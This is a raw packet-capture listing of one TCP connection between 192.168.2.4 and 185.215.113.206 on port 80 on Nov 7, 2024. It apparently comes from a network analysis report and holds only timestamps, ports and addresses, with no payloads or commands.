Nov 7, 2024 04:12:21.574315071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574326992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574328899 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574353933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574364901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574374914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574378014 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574393034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574395895 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574404955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574409008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574417114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574423075 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574434996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574445963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574454069 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574456930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574475050 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574501038 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574563026 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574573994 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574609995 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574652910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574664116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574675083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574686050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574697018 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574721098 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574743986 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574776888 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574835062 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574876070 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574887037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574915886 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574922085 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574928999 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574950933 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574976921 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574979067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574989080 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575001001 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575014114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575014114 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575025082 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575047016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575052977 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575058937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575069904 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575079918 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575082064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575094938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575119019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575129986 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575139999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575139999 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575165987 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575190067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575217962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575234890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575246096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575256109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575268030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575278044 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575285912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575297117 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575306892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575309992 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575323105 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575325966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575336933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575347900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575361967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575383902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575402975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575414896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575421095 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575426102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575442076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575468063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575475931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575512886 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575586081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575592995 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575601101 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575613976 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575624943 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575635910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575647116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575649977 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575670958 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575685978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575778008 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575789928 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575799942 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575812101 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575823069 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575823069 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575835943 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575840950 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575850010 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575856924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575860023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575871944 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575890064 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575903893 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575916052 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575918913 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575927973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575939894 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.575947046 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575953960 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.575974941 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576009989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576020956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576030970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576052904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576075077 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576142073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576152086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576162100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576173067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576184034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576189041 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576194048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576206923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576216936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576217890 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576230049 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576250076 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576253891 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576261044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576293945 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576364994 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576375008 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576384068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576395035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576402903 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576405048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576431036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576455116 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576529980 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576541901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576551914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576551914 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576564074 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576569080 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576575994 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.576590061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576611042 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.576726913 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.577826023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.612942934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.612956047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.612967014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613001108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613029957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613080978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613100052 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613111019 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613127947 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613138914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613141060 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613152027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613161087 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613192081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613204956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613231897 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613243103 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613246918 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613254070 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613265038 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613270998 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613284111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613284111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613296986 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613302946 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613310099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613329887 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613358021 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613459110 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613497019 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613508940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613518953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613531113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613538980 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613542080 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613558054 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613579988 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613702059 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613719940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613730907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613743067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613750935 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613755941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613769054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613775015 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613779068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613791943 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613795996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613809109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613817930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613820076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613837004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613848925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613857985 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613859892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613869905 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613879919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613889933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613899946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.613903999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613924026 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.613941908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.682954073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683095932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683106899 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683156967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.683226109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683238029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683248043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683259010 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683263063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.683270931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683280945 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683291912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.683295012 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.683321953 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.683331013 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.795205116 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.800045967 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076422930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076473951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076484919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076497078 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076546907 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076550961 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076565027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076575994 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076580048 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076589108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076591969 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076603889 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076611042 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076623917 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076642036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076644897 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076664925 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076687098 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076770067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076781034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076792955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076805115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076812983 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076817036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076829910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076845884 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076847076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076858997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076869011 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076874971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076877117 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076899052 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076910973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076915979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076931000 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076939106 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076952934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076963902 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076970100 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076975107 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076977968 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076987028 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.076997995 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.076998949 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077013969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077023029 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077043056 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077066898 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077205896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077218056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077229023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077248096 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077266932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077305079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077316999 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077347040 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077363968 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077374935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077384949 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077394962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077409983 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077418089 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077421904 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077430964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077438116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077465057 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077491045 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077553988 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077564955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077579021 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077601910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077601910 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077615976 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077625036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077647924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077660084 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077660084 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077675104 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077677965 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077687025 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077697992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077707052 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077708006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077728033 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077730894 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077740908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077763081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077773094 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077775002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077796936 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077800035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077819109 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077824116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077836037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077835083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077847004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077857971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077877045 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077888012 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077899933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077908993 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077910900 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077925920 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077927113 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077938080 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077944040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077950954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077956915 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.077958107 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.077963114 CET	80	49755	185.215.113.206	192.168.2.4
